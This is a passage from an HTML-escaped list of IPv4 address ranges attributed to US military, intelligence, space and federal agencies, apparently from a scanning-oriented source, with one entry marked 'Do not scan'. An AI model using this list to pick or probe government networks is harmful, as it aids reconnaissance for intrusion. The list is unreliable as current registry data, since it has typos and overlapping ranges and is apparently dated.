/&gt;134.165.0.0 Headquarters Air Force Space Command&lt;br /&gt;134.194.0.0 U.S. Army Aberdeen Test Center&lt;br /&gt;134.205.0.0 7th Communications Group&lt;br /&gt;134.207.0.0 Naval Research Laboratory&lt;br /&gt;134.229.0.0 Navy Regional Data Automation Center&lt;br /&gt;134.230.0.0 Navy Regional Data Automation Center&lt;br /&gt;134.232.0.0 - 134.232.255.255 U.S. Army, Europe&lt;br /&gt;134.233.0.0 HQ 5th Signal Command&lt;br /&gt;134.234.0.0 - 134.234.255.255 Southern European Task Force&lt;br /&gt;134.235.0.0 HQ 5th Signal Command&lt;br /&gt;134.240.0.0 U.S. Military Academy&lt;br /&gt;136.149.0.0 Air Force Military Personnel Center&lt;br /&gt;&lt;br /&gt;RANGE 136&lt;br /&gt;136.178.0.0 NASA Research Network&lt;br /&gt;136.188.0.0 - 136.197.255.255 Defense Intelligence Agency&lt;br /&gt;136.207.0.0 69th Signal Battalion&lt;br /&gt;136.208.0.0 HQ, 5th Signal Command&lt;br /&gt;136.209.0.0 HQ 5th Signal Command&lt;br /&gt;136.210.0.0 HQ 5th Signal Command&lt;br /&gt;136.212.0.0 HQ 5th Signal Command&lt;br /&gt;136.213.0.0 HQ, 5th Signal Command&lt;br /&gt;136.214.0.0 HQ, 5th Signal Command&lt;br /&gt;136.215.0.0 HQ, 5th Signal Command&lt;br /&gt;136.216.0.0 HQ, 5th Signal Command&lt;br /&gt;136.217.0.0 HQ, 5th Signal Command&lt;br /&gt;136.218.0.0 HQ, 5th Signal Command&lt;br /&gt;136.219.0.0 HQ, 5th Signal Command&lt;br /&gt;136.220.0.0 HQ, 5th Signal Command&lt;br /&gt;136.221.0.0 HQ, 5th Signal Command&lt;br /&gt;136.222.0.0 HQ, 5th Signal Command&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;RANGE 137&lt;br /&gt;137.1.0.0 Whiteman Air Force Base&lt;br /&gt;137.2.0.0 George Air Force Base&lt;br /&gt;137.3.0.0 Little Rock Air Force Base&lt;br /&gt;137.4.0.0 - 137.4.255.255 437 CS/SC&lt;br /&gt;137.5.0.0 Air Force Concentrator Network&lt;br /&gt;137.6.0.0 Air Force Concentrator Network&lt;br /&gt;137.11.0.0 HQ AFSPC/SCNNC&lt;br /&gt;137.12.0.0 Air Force Concentrator Network&lt;br /&gt;137.17.* National Aerospace Laboratory&lt;br /&gt;137.24.0.0 Naval Surface Warfare Center&lt;br /&gt;137.29.0.0 First Special Operations Command&lt;br /&gt;137.67.0.0 Naval Warfare Assessment Center&lt;br /&gt;137.94.* Royal Military College&lt;br /&gt;137.95.* Headquarters, U.S. European Command&lt;br /&gt;137.126.0.0 USAF MARS&lt;br /&gt;137.127.* Army Concepts Analysis Agency&lt;br /&gt;137.128.* U.S. ARMY Tank-Automotive Command&lt;br /&gt;137.130.0.0 Defense Information Systems Agency&lt;br /&gt;137.209.0.0 Defense Information Systems Agency&lt;br /&gt;137.210.0.0 Defense Information Systems Agency&lt;br /&gt;137.211.0.0 Defense Information Systems Agency&lt;br /&gt;137.212.0.0 Defense Information Systems Agency&lt;br /&gt;137.231.0.0 HQ 5th Signal Command&lt;br /&gt;137.232.0.0 Defense Information Systems Agency&lt;br /&gt;137.233.0.0 Defense Information Systems Agency&lt;br /&gt;137.234.0.0 Defense Information Systems Agency&lt;br /&gt;137.235.0.0 Defense Information Systems Agency&lt;br /&gt;137.240.0.0 Air Force Materiel Command&lt;br /&gt;137.241.0.0 75 ABW&lt;br /&gt;137.242.0.0 Air Force Logistics Command&lt;br /&gt;137.243.0.0 77 CS/SCCN&lt;br /&gt;137.244.0.0 78 CS/SCSC&lt;br /&gt;137.245.0.0 Wright Patterson Air Force Base&lt;br /&gt;137.246.0.0 United States Atlantic Command Joint Training&lt;br /&gt;&lt;br /&gt;RANGE 138&lt;br /&gt;138.13.0.0 Air Force Systems Command&lt;br /&gt;138.27.0.0 Army Information Systems Command&lt;br /&gt;138.50.0.0 HQ 5th Signal Command&lt;br /&gt;138.65.0.0 HQ, 5th Signal Command&lt;br /&gt;138.76.0.0 NASA Headquarters&lt;br /&gt;138.109.0.0 Naval Surface Warfare Center&lt;br /&gt;138.115.0.0 NASA Information and Electronic Systems Laboratory&lt;br /&gt;138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR&lt;br /&gt;138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications Station&lt;br /&gt;138.137.0.0 Navy Regional Data Automation Center (NARDAC)&lt;br /&gt;138.139.0.0 Marine Corps Air Station&lt;br /&gt;138.140.0.0 Navy Regional Data Automation Center&lt;br /&gt;138.141.0.0 Navy Regional Data Automation Center&lt;br /&gt;138.142.0.0 Navy Regional Data Automation Center&lt;br /&gt;138.143.0.0 Navy Regional Data Automation Center&lt;br /&gt;138.144.0.0 NAVCOMTELCOM&lt;br /&gt;138.145.0.0 NCTS WASHINGTON&lt;br /&gt;138.146.0.0 NCTC&lt;br /&gt;138.147.0.0 NCTC&lt;br /&gt;138.148.0.0 NCTC&lt;br /&gt;138.149.0.0 NCTC&lt;br /&gt;138.150.0.0 NCTC&lt;br /&gt;138.151.0.0 NCTC&lt;br /&gt;138.152.0.0 NCTC&lt;br /&gt;138.153.0.0 Yokosuka Naval Base&lt;br /&gt;138.154.0.0 NCTC&lt;br /&gt;138.155.0.0 NCTC&lt;br /&gt;138.156.0.0 Marine Corps Central Design &amp;amp; Prog. Activity&lt;br /&gt;138.157.0.0 - 138.157.255.255 Marine Corps Central Design &amp;amp; Prog. Activity&lt;br /&gt;138.158.0.0 Marine Corps Central Design &amp;amp; Prog. Activity&lt;br /&gt;138.159.0.0 NCTC&lt;br /&gt;138.160.0.0 Naval Air Station&lt;br /&gt;138.161.0.0 NCTC&lt;br /&gt;138.162.0.0 NCTC&lt;br /&gt;138.163.0.0 NCTC&lt;br /&gt;138.164.0.0 NCTC&lt;br /&gt;138.165.0.0 NCTC&lt;br /&gt;138.166.0.0 NCTC&lt;br /&gt;138.167.0.0 NOC, MCTSSA, East&lt;br /&gt;138.168.0.0 Marine Corps Central Design &amp;amp; Prog. Activity&lt;br /&gt;138.169.0.0 NAVAL COMPUTER AND TELECOMM&lt;br /&gt;138.169.12.0 NAVAL COMPUTER AND TELECOMM&lt;br /&gt;138.169.13.0 NAVAL COMPUTER AND TELECOMM&lt;br /&gt;138.170.0.0 NCTC&lt;br /&gt;138.171.0.0 NCTC&lt;br /&gt;138.172.0.0 NCTC&lt;br /&gt;138.173.0.0 NCTC&lt;br /&gt;138.174.0.0 NCTC&lt;br /&gt;138.175.0.0 NCTC&lt;br /&gt;138.176.0.0 NCTC&lt;br /&gt;138.177.0.0 NCTS Pensacola&lt;br /&gt;138.178.0.0 NCTC&lt;br /&gt;138.179.0.0 NCTC&lt;br /&gt;138.180.0.0 NCTC&lt;br /&gt;138.181.0.0 NCTC&lt;br /&gt;138.182.0.0 CNO N60&lt;br /&gt;138.183.0.0 NCTC&lt;br /&gt;138.184.0.0 NCTS&lt;br /&gt;138.193.0.0 NASA/Yellow Creek&lt;br /&gt;&lt;br /&gt;RANGE 139&lt;br /&gt;139.31.0.0 20th Tactical Fighter Wing&lt;br /&gt;139.32.0.0 48th Tactical Fighter Wing&lt;br /&gt;139.33.0.0 36th Tactical Fighter Wing&lt;br /&gt;139.34.0.0 52nd Tactical Fighter Wing&lt;br /&gt;139.35.0.0 50th Tactical Fighter Wing&lt;br /&gt;139.36.0.0 66th Electronic Combat Wing&lt;br /&gt;139.37.0.0 26th Tactical Reconnaissance Wing&lt;br /&gt;139.38.0.0 32nd Tactical Fighter Squadron&lt;br /&gt;139.39.0.0 81st Tactical Fighter Wing&lt;br /&gt;139.40.0.0 10th Tactical Fighter Wing&lt;br /&gt;139.41.0.0 39th Tactical Air Control Group&lt;br /&gt;139.42.0.0 40th Tactical Air Control Group&lt;br /&gt;139.43.0.0 401st Tactical Fighter Wing&lt;br /&gt;139.124.* Reseau Infomratique&lt;br /&gt;139.142.*.*&lt;br /&gt;&lt;br /&gt;RANGE 140&lt;br /&gt;140.1.0.0 Defense Information Systems Agency&lt;br /&gt;140.3.0.0 Defense Information Systems Agency&lt;br /&gt;140.4.0.0 Defense Information Systems Agency&lt;br /&gt;140.5.0.0 Defense Information Systems Agency&lt;br /&gt;140.6.0.0 Defense Information Systems Agency&lt;br /&gt;140.7.0.0 Defense Information Systems Agency&lt;br /&gt;140.8.0.0 Defense Information Systems Agency&lt;br /&gt;140.9.0.0 Defense Information Systems Agency&lt;br /&gt;140.10.0.0 Defense Information Systems Agency&lt;br /&gt;140.11.0.0 Defense Information Systems Agency&lt;br /&gt;140.12.0.0 Defense Information Systems Agency&lt;br /&gt;140.13.0.0 Defense Information Systems Agency&lt;br /&gt;140.14.0.0 DISA Columbus Level II NOC&lt;br /&gt;140.15.0.0 Defense Information Systems Agency&lt;br /&gt;140.16.0.0 Defense Information Systems Agency&lt;br /&gt;140.17.0.0 Defense Information Systems Agency&lt;br /&gt;140.18.0.0 Defense Information Systems Agency&lt;br /&gt;140.19.0.0 Defense Information Systems Agency&lt;br /&gt;140.20.0.0 Defense Information Systems Agency&lt;br /&gt;140.21.0.0 Defense Information Systems Agency&lt;br /&gt;140.22.0.0 Defense Information Systems Agency&lt;br /&gt;140.23.0.0 Defense Information Systems Agency&lt;br /&gt;140.24.0.0 ASIC ALLIANCE-MARLBORO&lt;br /&gt;140.25.0.0 Defense Information Systems Agency&lt;br /&gt;140.26.0.0 Defense Information Systems Agency&lt;br /&gt;140.27.0.0 Defense Information Systems Agency&lt;br /&gt;140.28.0.0 Defense Information Systems Agency&lt;br /&gt;140.29.0.0 Defense Information Systems Agency&lt;br /&gt;140.30.0.0 Defense Information Systems Agency&lt;br /&gt;140.31.0.0 Defense Information Systems Agency&lt;br /&gt;140.32.0.0 Defense Information Systems Agency&lt;br /&gt;140.33.0.0 Defense Information Systems Agency&lt;br /&gt;140.34.0.0 Defense Information Systems Agency&lt;br /&gt;140.35.0.0 Defense Information Systems Agency&lt;br /&gt;140.36.0.0 Defense Information Systems Agency&lt;br /&gt;140.37.0.0 Defense Information Systems Agency&lt;br /&gt;140.38.0.0 Defense Information Systems Agency&lt;br /&gt;140.39.0.0 Defense Information Systems Agency&lt;br /&gt;140.40.0.0 Defense Information Systems Agency&lt;br /&gt;140.41.0.0 Defense Information Systems Agency&lt;br /&gt;140.42.0.0 Defense Information Systems Agency&lt;br /&gt;140.43.0.0 Defense Information Systems Agency&lt;br /&gt;140.44.0.0 Defense Information Systems Agency&lt;br /&gt;140.45.0.0 Defense Information Systems Agency&lt;br /&gt;140.46.0.0 Defense Information Systems Agency&lt;br /&gt;140.47.0.0 - 140.47.255.255 Defense Information Systems Agency&lt;br /&gt;140.47.0.0 - 140.48.255.255 DOD Network Information Center&lt;br /&gt;140.48.0.0 - 140.48.255.255 Defense Information Systems Agency&lt;br /&gt;140.49.0.0 Defense Information Systems Agency&lt;br /&gt;140.50.0.0 Defense Information Systems Agency&lt;br /&gt;140.51.0.0 Defense Information Systems Agency&lt;br /&gt;140.52.0.0 Defense Information Systems Agency&lt;br /&gt;140.53.0.0 Defense Information Systems Agency&lt;br /&gt;140.54.0.0 Defense Information Systems Agency&lt;br /&gt;140.55.0.0 Defense Information Systems Agency&lt;br /&gt;140.56.0.0 Defense Information Systems Agency&lt;br /&gt;140.57.0.0 Defense Information Systems Agency&lt;br /&gt;140.58.0.0 Defense Information Systems Agency&lt;br /&gt;140.59.0.0 Defense Information Systems Agency&lt;br /&gt;140.60.0.0 Defense Information Systems Agency&lt;br /&gt;140.61.0.0 Defense Information Systems Agency&lt;br /&gt;140.62.0.0 Defense Information Systems Agency&lt;br /&gt;140.63.0.0 Defense Information Systems Agency&lt;br /&gt;140.64.0.0 Defense Information Systems Agency&lt;br /&gt;140.65.0.0 Defense Information Systems Agency&lt;br /&gt;140.66.0.0 Defense Information Systems Agency&lt;br /&gt;140.67.0.0 Defense Information Systems Agency&lt;br /&gt;140.68.0.0 Defense Information Systems Agency&lt;br /&gt;140.69.0.0 Defense Information Systems Agency&lt;br /&gt;140.70.0.0 Defense Information Systems Agency&lt;br /&gt;140.71.0.0 Defense Information Systems Agency&lt;br /&gt;140.72.0.0 Defense Information Systems Agency&lt;br /&gt;140.73.0.0 Defense Information Systems Agency&lt;br /&gt;140.74.0.0 - 140.74.255.255 Defense Information Systems Agency&lt;br /&gt;140.100.0.0 Naval Sea Systems Command&lt;br /&gt;140.139.0.0 HQ US Army Medical Research and Development Command&lt;br /&gt;140.154.0.0 HQ 5th Signal Command&lt;br /&gt;140.155.0.0 HQ, 5th Signal Command&lt;br /&gt;140.156.0.0 HQ, 5th Signal Command&lt;br /&gt;140.175.0.0 Scott Air Force Base&lt;br /&gt;140.178.0.0 Naval Undersea Warfare Center Division, Keyport&lt;br /&gt;140.187.0.0 Fort Bragg&lt;br /&gt;140.194.0.0 US Army Corps of Engineers&lt;br /&gt;140.195.0.0 Naval Sea Systems Command&lt;br /&gt;140.199.0.0 Naval Ocean Systems Center&lt;br /&gt;140.201.0.0 HQ, 5th Signal Command&lt;br /&gt;140.202.0.0 106TH SIGNAL BRIGADE&lt;br /&gt;&lt;br /&gt;RANGE 143&lt;br /&gt;143.45.0.0 58th Signal Battalion&lt;br /&gt;143.46.0.0 U.S. Army, 1141st Signal Battalion&lt;br /&gt;143.68.0.0 Headquarters, USAISC&lt;br /&gt;143.69.0.0 Headquarters, USAAISC&lt;br /&gt;143.70.0.0 Headquarters, USAAISC&lt;br /&gt;143.71.0.0 Headquarters, USAAISC&lt;br /&gt;143.72.0.0 Headquarters, USAAISC&lt;br /&gt;143.73.0.0 Headquarters, USAAISC&lt;br /&gt;143.74.0.0 Headquarters, USAAISC&lt;br /&gt;143.75.0.0 Headquarters, USAAISC&lt;br /&gt;143.76.0.0 Headquarters, USAAISC&lt;br /&gt;143.77.0.0 Headquarters, USAAISC&lt;br /&gt;143.78.0.0 Headquarters, USAAISC&lt;br /&gt;143.79.0.0 Headquarters, USAAISC&lt;br /&gt;143.80.0.0 Headquarters, USAAISC&lt;br /&gt;143.81.0.0 Headquarters, USAAISC&lt;br /&gt;143.82.0.0 Headquarters, USAAISC&lt;br /&gt;143.84.0.0 Headquarters, USAAISC&lt;br /&gt;143.85.0.0 Headquarters, USAAISC&lt;br /&gt;143.86.0.0 Headquarters, USAAISC&lt;br /&gt;143.87.0.0 Headquarters, USAAISC&lt;br /&gt;143.232.0.0 NASA Ames Research Center&lt;br /&gt;&lt;br /&gt;RANGE 144&lt;br /&gt;144.99.0.0 United States Army Information Systems Command&lt;br /&gt;144.109.0.0 Army Information Systems Command&lt;br /&gt;144.143.0.0 Headquarters, Third United States Army&lt;br /&gt;144.144.0.0 Headquarters, Third United States Army&lt;br /&gt;144.146.0.0 Commander, Army Information Systems Center&lt;br /&gt;144.147.0.0 Commander, Army Information Systems Center&lt;br /&gt;144.170.0.0 HQ, 5th Signal Command&lt;br /&gt;144.192.0.0 United States Army Information Services Command-Campbell&lt;br /&gt;144.233.0.0 Defense Intelligence Agency&lt;br /&gt;144.234.0.0 Defense Intelligence Agency&lt;br /&gt;144.235.0.0 Defense Intelligence Agency&lt;br /&gt;144.236.0.0 Defense Intelligence Agency&lt;br /&gt;144.237.0.0 Defense Intelligence Agency&lt;br /&gt;144.238.0.0 Defense Intelligence Agency&lt;br /&gt;144.239.0.0 Defense Intelligence Agency&lt;br /&gt;144.240.0.0 Defense Intelligence Agency&lt;br /&gt;144.241.0.0 Defense Intelligence Agency&lt;br /&gt;144.242.0.0 Defense Intelligence Agency&lt;br /&gt;144.252.0.0 U.S. Army LABCOM&lt;br /&gt;&lt;br /&gt;RANGE 146&lt;br /&gt;146.17.0.0 HQ, 5th Signal Command&lt;br /&gt;146.80.0.0 Defence Research Agency&lt;br /&gt;146.98.0.0 HQ United States European Command&lt;br /&gt;146.154.0.0 NASA/Johnson Space Center&lt;br /&gt;146.165.0.0 NASA Langley Research Center&lt;br /&gt;&lt;br /&gt;RANGE 147&lt;br /&gt;147.35.0.0 HQ, 5th Signal Command&lt;br /&gt;147.36.0.0 HQ, 5th Signal Command&lt;br /&gt;147.37.0.0 HQ, 5th Signal Command&lt;br /&gt;147.38.0.0 HQ, 5th Signal Command&lt;br /&gt;147.39.0.0 HQ, 5th Signal Command&lt;br /&gt;147.40.0.0 HQ, 5th Signal Command&lt;br /&gt;147.42.0.0 Army CALS Project&lt;br /&gt;147.103.0.0 Army Information Systems Software Center&lt;br /&gt;147.104.0.0 Army Information Systems Software Center&lt;br /&gt;147.159.0.0 Naval Air Warfare Center, Aircraft Division&lt;br /&gt;147.168.0.0 Naval Surface Warfare Center&lt;br /&gt;147.169.0.0 HQ, 5th Signal Command&lt;br /&gt;147.198.0.0 Army Information Systems Command&lt;br /&gt;147.199.0.0 Army Information Systems Command&lt;br /&gt;147.238.0.0 Army Information Systems Command&lt;br /&gt;147.239.0.0 1112th Signal Battalion&lt;br /&gt;147.240.0.0 US Army Tank-Automotive Command&lt;br /&gt;147.242.0.0 19th Support Command&lt;br /&gt;147.248.0.0 Fort Monroe DOIM&lt;br /&gt;147.254.0.0 7th Communications Group&lt;br /&gt;&lt;br /&gt;RANGE 148&lt;br /&gt;148.114.0.0 NASA, Stennis Space Center&lt;br /&gt;&lt;br /&gt;RANGE 150&lt;br /&gt;150.113.0.0 1114th Signal Battalion&lt;br /&gt;150.114.0.0 1114th Signal Battalion&lt;br /&gt;150.125.0.0 Space and Naval Warfare Command&lt;br /&gt;150.133.0.0 10th Area Support Group&lt;br /&gt;150.144.0.0 NASA Goodard Space Flight Center&lt;br /&gt;150.149.0.0 Army Information Systems Command&lt;br /&gt;150.157.0.0 USAISC-Fort Lee&lt;br /&gt;150.184.0.0 Fort Monroe DOIM&lt;br /&gt;150.190.0.0 USAISC-Letterkenny&lt;br /&gt;150.196.0.0 USAISC-LABCOM&lt;br /&gt;&lt;br /&gt;RANGE 152&lt;br /&gt;152.82.0.0 7th Communications Group of the Air Force&lt;br /&gt;152.151.0.0 U.S. Naval Space &amp;amp; Naval Warfare Systems Command&lt;br /&gt;152.152.0.0 NATO Headquarters&lt;br /&gt;152.154.0.0 Defense Information Systems Agency&lt;br /&gt;152.229.0.0 Defense MegaCenter (DMC) Denver&lt;br /&gt;&lt;br /&gt;RANGE 153&lt;br /&gt;153.21.0.0 USCENTAF/SCM&lt;br /&gt;153.22.0.0 USCENTAF/SCM&lt;br /&gt;153.23.0.0 USCENTAF/SCM&lt;br /&gt;153.24.0.0 USCENTAF/SCM&lt;br /&gt;153.25.0.0 USCENTAF/SCM&lt;br /&gt;153.26.0.0 USCENTAF/SCM&lt;br /&gt;153.27.0.0 USCENTAF/SCM&lt;br /&gt;153.28.0.0 USCENTAF/SCM&lt;br /&gt;153.29.0.0 USCENTAF/SCM&lt;br /&gt;153.30.0.0 USCENTAF/SCM&lt;br /&gt;153.31.0.0 Federal Bureau of Investigation&lt;br /&gt;&lt;br /&gt;RANGE 155&lt;br /&gt;155.5.0.0 1141st Signal Bn&lt;br /&gt;155.6.0.0 1141st Signal Bn&lt;br /&gt;155.7.0.0 American Forces Information&lt;br /&gt;155.8.0.0 U.S. ArmyFort Gordon&lt;br /&gt;155.9.0.0 - 155.9.255.255 United States Army Information Systems Command&lt;br /&gt;155.74.0.0 PEO STAMIS&lt;br /&gt;155.75.0.0 US Army Corps of Engineers&lt;br /&gt;155.76.0.0 PEO STAMIS&lt;br /&gt;155.77.0.0 PEO STAMIS&lt;br /&gt;155.78.0.0 PEO STAMIS&lt;br /&gt;155.79.0.0 US Army Corps of Engineers&lt;br /&gt;155.80.0.0 PEO STAMIS&lt;br /&gt;155.81.0.0 PEO STAMIS&lt;br /&gt;155.82.0.0 PEO STAMIS&lt;br /&gt;155.83.0.0 US Army Corps of Enginers&lt;br /&gt;155.84.0.0 PEO STAMIS&lt;br /&gt;155.85.0.0 PEO STAMIS&lt;br /&gt;155.86.0.0 US Army Corps of Engineers&lt;br /&gt;155.87.0.0 PEO STAMIS&lt;br /&gt;155.88.0.0 PEO STAMIS&lt;br /&gt;155.96.0.0 Drug Enforcement Administration&lt;br /&gt;155.149.0.0 1112th Signal Battalion&lt;br /&gt;155.155.0.0 HQ, 5th Signal Command&lt;br /&gt;155.178.0.0 Federal Aviation Administration&lt;br /&gt;155.213.0.0 USAISC Fort Benning&lt;br /&gt;155.214.0.0 Director of Information Management&lt;br /&gt;155.215.0.0 USAISC-FT DRUM&lt;br /&gt;155.216.0.0 TCACCIS Project Management Office&lt;br /&gt;155.217.0.0 Directorate of Information Management&lt;br /&gt;155.218.0.0 USAISC&lt;br /&gt;155.219.0.0 DOIM/USAISC Fort Sill&lt;br /&gt;155.220.0.0 USAISC-DOIM&lt;br /&gt;155.221.0.0 USAISC-Ft Ord&lt;br /&gt;&lt;br /&gt;RANGE 156&lt;br /&gt;156.9.0.0 U. S. Marshals Service&lt;br /&gt;&lt;br /&gt;RANGE 157&lt;br /&gt;157.150.0.0 United Nations&lt;br /&gt;157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET&lt;br /&gt;157.202.0.0 US Special Operations Command&lt;br /&gt;157.217.0.0 U. S. Strategic Command&lt;br /&gt;&lt;br /&gt;RANGE 158&lt;br /&gt;158.1.0.0 Commander, Tooele Army Depot&lt;br /&gt;158.2.0.0 USAMC Logistics Support Activity&lt;br /&gt;158.3.0.0 U.S. Army TACOM&lt;br /&gt;158.4.0.0 UASISC Ft. Carson&lt;br /&gt;158.5.0.0 1112th Signal Battalion&lt;br /&gt;158.6.0.0 USAISC-Ft. McCoy&lt;br /&gt;158.7.0.0 USAISC-FLW&lt;br /&gt;158.8.0.0 US Army Soldier Support Center&lt;br /&gt;158.9.0.0 USAISC-CECOM&lt;br /&gt;158.10.0.0 GOC&lt;br /&gt;158.11.0.0 UASISC-Vint Hill&lt;br /&gt;158.12.0.0 US Army Harry Diamond Laboratories&lt;br /&gt;158.13.0.0 USAISC DOIM&lt;br /&gt;158.14.0.0 1112th Signal Battalion&lt;br /&gt;158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville&lt;br /&gt;158.16.0.0 Rocky Mountain Arsenal (PMRMA)&lt;br /&gt;158.17.0.0 Crane Army Ammunition Activity&lt;br /&gt;158.18.0.0 Defense Finance &amp;amp; Accounting Service Center&lt;br /&gt;158.19.0.0 DOIM&lt;br /&gt;158.20.0.0 DOIM&lt;br /&gt;158.235.0.0 Marine Corps Central Design and Programming Activity&lt;br /&gt;158.243.0.0 Marine Corps Central Design and Programming Activity&lt;br /&gt;158.244.0.0 Marine Corps Central Design and Programming Activity&lt;br /&gt;158.245.0.0 Marine Corps Central Design and Programming Activity&lt;br /&gt;158.246.0.0 Marine Corps Central Design and Programming Activity&lt;br /&gt;&lt;br /&gt;RANGE 159&lt;br /&gt;159.120.0.0 Naval Air Systems Command (Air 4114)&lt;br /&gt;&lt;br /&gt;RANGE 160&lt;br /&gt;160.132.0.0 US Army Recruiting Command&lt;br /&gt;160.135.0.0 36th Signal BN&lt;br /&gt;160.138.0.0 USAISC&lt;br /&gt;160.139.0.0 USAISC&lt;br /&gt;160.140.0.0 HQ, United States Army&lt;br /&gt;160.143.0.0 USAISC&lt;br /&gt;160.145.0.0 1101st Signal Brigade&lt;br /&gt;160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS&lt;br /&gt;160.150.0.0 Commander, Moncrief Army Hospital&lt;br /&gt;&lt;br /&gt;RANGE 161&lt;br /&gt;161.124.0.0 NAVAL WEAPONS STATION&lt;br /&gt;&lt;br /&gt;RANGE 162&lt;br /&gt;162.32.0.0 Naval Aviation Depot Pensacola&lt;br /&gt;162.45.0.0 Central Intelligence Agency&lt;br /&gt;162.46.0.0 Central Intelligence Agency&lt;br /&gt;&lt;br /&gt;RANGE 163&lt;br /&gt;163.205.0.0 NASA Kennedy Space Center&lt;br /&gt;163.206.0.0 NASA Kennedy Space Center&lt;br /&gt;&lt;br /&gt;RANGE 164&lt;br /&gt;164.45.0.0 Naval Ordnance Center, Pacific Division&lt;br /&gt;164.49.0.0 United States Army Space and Strategic Defense&lt;br /&gt;164.158.0.0 Naval Surface Warfare Center&lt;br /&gt;164.217.0.0 Institute for Defense Analyses&lt;br /&gt;164.218.0.0 Bureau of Naval Personnel&lt;br /&gt;164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER&lt;br /&gt;164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET&lt;br /&gt;164.221.0.0 - 164.221.255.255 Information Technology&lt;br /&gt;164.223.0.0 Naval Undersea Warfare Center&lt;br /&gt;164.224.0.0 Secretary of the Navy&lt;br /&gt;164.225.0.0 U.S. Army Intelligence and Security Command&lt;br /&gt;164.226.0.0 Naval Exchange Service Command&lt;br /&gt;164.227.0.0 Naval Surface Warfare Center, Crane Division&lt;br /&gt;164.228.0.0 USCINCPAC J21T&lt;br /&gt;164.229.0.0 NCTS-NOLA&lt;br /&gt;164.230.0.0 Naval Aviation Depot&lt;br /&gt;164.231.0.0 Military Sealift Command&lt;br /&gt;164.232.0.0 - 164.232.255.255 United States Southern Command&lt;br /&gt;&lt;br /&gt;RANGE 167&lt;br /&gt;167.44.0.0 Government Telecommunications Agency&lt;br /&gt;&lt;br /&gt;RANGE 168&lt;br /&gt;168.68.0.0 USDA Office of Operations&lt;br /&gt;168.85.0.0 Fort Sanders Alliance&lt;br /&gt;168.102.0.0 Indiana Purdue Fort Wayne&lt;br /&gt;&lt;br /&gt;RANGE 169&lt;br /&gt;169.252.0.0 - 169.253.0.0 U.S. Department of State&lt;br /&gt;&lt;br /&gt;RANGE 194&lt;br /&gt;&lt;br /&gt;RANGE 195&lt;br /&gt;195.10.* Various - Do not scan&lt;br /&gt;&lt;br /&gt;RANGE 199&lt;br /&gt;199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA&lt;br /&gt;&lt;br /&gt;RANGE 203&lt;br /&gt;203.59.0.0 - 203.59.255.255 Perth Australia iiNET&lt;br /&gt;&lt;br /&gt;RANGE 204&lt;br /&gt;204.34.0.0 - 204.34.15.0 IPC JAPAN&lt;br /&gt;204.34.0.0 - 204.37.255.0 DOD Network Information Center&lt;br /&gt;204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery&lt;br /&gt;204.34.32.0 - 204.34.63.0 USACOM&lt;br /&gt;204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE&lt;br /&gt;204.34.128.0 DISA-Eucom / BBN-STD, Inc.&lt;br /&gt;204.34.129.0 Defense Technical Information Center&lt;br /&gt;204.34.130.0 GSI&lt;br /&gt;204.34.131.0 NSA NAPLES ITALY&lt;br /&gt;204.34.132.0 NAVSTA ROTA SPAIN&lt;br /&gt;204.34.133.0 NAS SIGONELLA ITALY&lt;br /&gt;204.34.134.0 Naval Air Warfare Center Aircraft Division&lt;br /&gt;204.34.135.0 GSI&lt;br /&gt;204.34.136.0 Naval Undersea Warfare Center USRD - Orlando&lt;br /&gt;204.34.137.0 Joint Spectrum Center&lt;br /&gt;204.34.138.0 GSI&lt;br /&gt;204.34.139.0 HQ, JFMO Korea, Headquarters&lt;br /&gt;204.34.140.0 DISA D75&lt;br /&gt;204.34.141.0 U. S. Naval Air Facility, Atsugi Japan&lt;br /&gt;204.34.142.0 Naval Enlisted Personnel Management Center&lt;br /&gt;204.34.143.0 Afloat Training Group Pacific&lt;br /&gt;204.34.144.0 HQ Special Operations Command - Europe&lt;br /&gt;204.34.145.0 Commander Naval Base Pearl Harbor&lt;br /&gt;204.34.147.0 NAVSEA Information Management Improvement Program&lt;br /&gt;204.34.148.0 Q112&lt;br /&gt;204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures&lt;br /&gt;204.34.150.0 Resource Consultants, Inc.&lt;br /&gt;204.34.151.0 Personnel Support Activity, San Diego&lt;br /&gt;204.34.152.0 NAVAL AIR FACILITY, ADAK&lt;br /&gt;204.34.153.0 NAVSEA Logistics Command Detachment&lt;br /&gt;204.34.154.0 PEARL HARBOR NAVAL SHIPYARD&lt;br /&gt;204.34.155.0 PEARL HARBOR NAVAL SHIPYARD&lt;br /&gt;204.34.156.0 Defense Photography School&lt;br /&gt;204.34.157.0 - 204.34.160.0 Defense Information School&lt;br /&gt;204.34.161.0 Naval Air Systems Command&lt;br /&gt;204.34.162.0 Puget Sound Naval Shipyard&lt;br /&gt;204.34.163.0 Joint Precision Strike Demonstration&lt;br /&gt;204.34.164.0 Naval Pacific Meteorology and Ocean&lt;br /&gt;204.34.165.0 Joint Precision Strike Demonstration&lt;br /&gt;204.34.167.0 USAF&lt;br /&gt;204.34.168.0 Commander&lt;br /&gt;204.34.169.0 Naval Air Warfare Center&lt;br /&gt;204.34.170.0 Naval Air Systems Command&lt;br /&gt;204.34.171.0 NAVSTA SUPPLY DEPARTMENT&lt;br /&gt;204.34.173.0 SUBMEPP Activity&lt;br /&gt;204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN&lt;br /&gt;204.34.176.0 DISA-PAC,IPC-GUAM&lt;br /&gt;204.34.177.0 Satellite Production Test Center&lt;br /&gt;204.34.181.0 940 Air Refueling Wing&lt;br /&gt;204.34.182.0 Defense Megacenter Warner Robins&lt;br /&gt;204.34.183.0 GCCS Support Facility&lt;br /&gt;204.34.184.0 Nav Air Tech Serv Facility-Detachment&lt;br /&gt;204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA&lt;br /&gt;204.34.186.0 Defense Logistics Agency - Europe&lt;br /&gt;204.34.187.0 NAVMASSO&lt;br /&gt;204.34.188.0 Commander-In-Chief, US Pacific Fleet&lt;br 